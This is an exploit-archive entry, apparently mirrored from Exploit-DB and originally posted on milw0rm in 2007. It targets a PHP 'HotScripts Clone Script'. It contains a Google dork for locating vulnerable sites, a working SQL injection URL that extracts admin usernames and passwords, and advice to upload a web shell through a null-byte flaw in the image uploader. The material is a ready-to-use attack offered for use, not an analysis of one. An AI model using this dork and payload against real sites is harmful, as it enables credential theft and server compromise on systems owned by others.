exploit-db-mirror/exploits/php/webapps/4633.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
1.1 KiB
Text

--==+================================================================================+==--
--==+ HotScripts Clone Script SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK (google): "Software Categories" "Featured Resources" "Search"
DESCRIPTION:
Pull admin info from database, and maybe upload shell.
EXPLOITS:
www.site.com/software-description.php?id=-1/**/UNION/**/ALL/**/SELECT/**/concat(admin_name,char(58),pwd)/**/FROM/**/sbwmd_admin/*
NOTE/TIP:
admin login is at /siteadmin/
image upload /siteadmin/fileupload.php, its vulnerable to PHP Nullbyte posisoning. so upload shell.
i know this doesnt look like a HotScripts clone but it is.
GREETZ: milw0rm.com, H4CK-Y0u.org
--==+================================================================================+==--
--==+ HotScripts Clone Script SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-11-18]